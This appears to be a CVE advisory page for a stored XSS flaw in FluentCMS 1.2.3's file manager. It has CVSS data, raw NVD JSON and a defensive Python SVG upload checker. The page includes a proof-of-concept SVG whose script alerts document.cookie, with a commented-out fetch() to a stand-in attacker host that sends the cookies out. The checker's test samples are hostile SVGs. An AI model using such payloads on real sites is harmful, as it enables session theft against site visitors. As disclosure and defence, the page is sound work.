Security Vulnerability Report
CVE-2025-70842 CVSS 5.4 MEDIUM

CVE-2025-70842

Published: 2026-05-12 15:16:12
Last Modified: 2026-05-13 15:43:05

Description

A Stored Cross-Site Scripting (XSS) vulnerability was discovered in the File Management module of FluentCMS 1.2.3. The flaw allows an authenticated administrator to upload crafted SVG files containing malicious JavaScript code. Once uploaded, the script executes in the browser of any user who accesses the direct URL of the image, including unauthenticated visitors.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

FluentCMS 1.2.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
svg
<!-- PoC: Malicious SVG for Stored XSS in FluentCMS -->
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <circle cx="50" cy="50" r="40" fill="red" />
  <script type="text/javascript">
    // Proof of Concept: Execute JavaScript when SVG is rendered
    alert('CVE-2025-70842 XSS Triggered: ' + document.cookie);
    // Example data exfiltration (commented out)
    // fetch('https://attacker-server.com/collect?q=' + encodeURIComponent(document.cookie));
  </script>
</svg>
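As an added defensive example (not code from this report or from FluentCMS), the check an upload handler could run over an SVG before storing it, flagging the constructs a payload like the one above relies on, plus the response headers with which stored SVGs can be served at a direct URL so that a file that slips through still cannot read the site's cookies. The sample SVGs are constructed for the demonstration.

```python
import xml.etree.ElementTree as ET

# Constructs that let an SVG document run script or embed HTML, and href
# schemes that execute when followed from <a> or <use>.
ACTIVE_ELEMENTS = {"script", "foreignObject"}
ACTIVE_SCHEMES = ("javascript:", "data:", "vbscript:")


def svg_active_content(svg_bytes: bytes) -> list[str]:
    """List script-bearing constructs in an uploaded SVG; empty means none found.
    Malformed XML raises ET.ParseError, which an upload handler should reject
    too. The stdlib parser does not fetch external entities; enforcing a size
    limit is still the caller's job."""
    findings = []
    for elem in ET.fromstring(svg_bytes).iter():
        tag = elem.tag.rsplit("}", 1)[-1]  # strip ElementTree's {namespace} prefix
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"<{tag}> element")
        for attr, value in elem.attrib.items():
            name = attr.rsplit("}", 1)[-1]  # so xlink:href is seen as href
            if name.lower().startswith("on"):  # onload, onclick, onerror, ...
                findings.append(f"{name} handler on <{tag}>")
            elif name == "href" and value.strip().lower().startswith(ACTIVE_SCHEMES):
                findings.append(f"active href on <{tag}>")
    return findings


def safe_svg_headers() -> dict[str, str]:
    """Headers for serving user-uploaded SVGs at a direct URL (defence in depth).
    The CSP forbids script and 'sandbox' gives the document an opaque origin, so
    a script that slipped past the check still cannot read the site's cookies."""
    return {
        "Content-Type": "image/svg+xml",
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
        "X-Content-Type-Options": "nosniff",
    }


# Constructed samples: a clean icon and three hostile variants.
SAMPLES = {
    "clean": b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="4" fill="red"/></svg>',
    "script": b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(document.cookie)</script></svg>',
    "handler": b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>',
    "href": b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><a xlink:href="javascript:alert(1)">x</a></svg>',
}

if __name__ == "__main__":
    for label, data in SAMPLES.items():
        print(label, "->", svg_active_content(data) or "no active content")
```

Rejecting on any finding is simpler and safer than trying to strip the offending nodes, since a rewriting sanitiser has to get every namespace and encoding corner case right.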

References

https://github.com/fluentcms/FluentCMS/issues/2404
https://github.com/fluentcms/FluentCMS/pull/2407

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-70842", "sourceIdentifier": "[email protected]", "published": "2026-05-12T15:16:12.163", "lastModified": "2026-05-13T15:43:05.440", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Stored Cross-Site Scripting (XSS) vulnerability was discovered in the File Management module of FluentCMS 1.2.3. The flaw allows an authenticated administrator to upload crafted SVG files containing malicious JavaScript code. Once uploaded, the script executes in the browser of any user who accesses the direct URL of the image, including unauthenticated visitors."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/fluentcms/FluentCMS/issues/2404", "source": "[email protected]"}, {"url": "https://github.com/fluentcms/FluentCMS/pull/2407", "source": "[email protected]"}, {"url": "https://github.com/fluentcms/FluentCMS/issues/2404", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}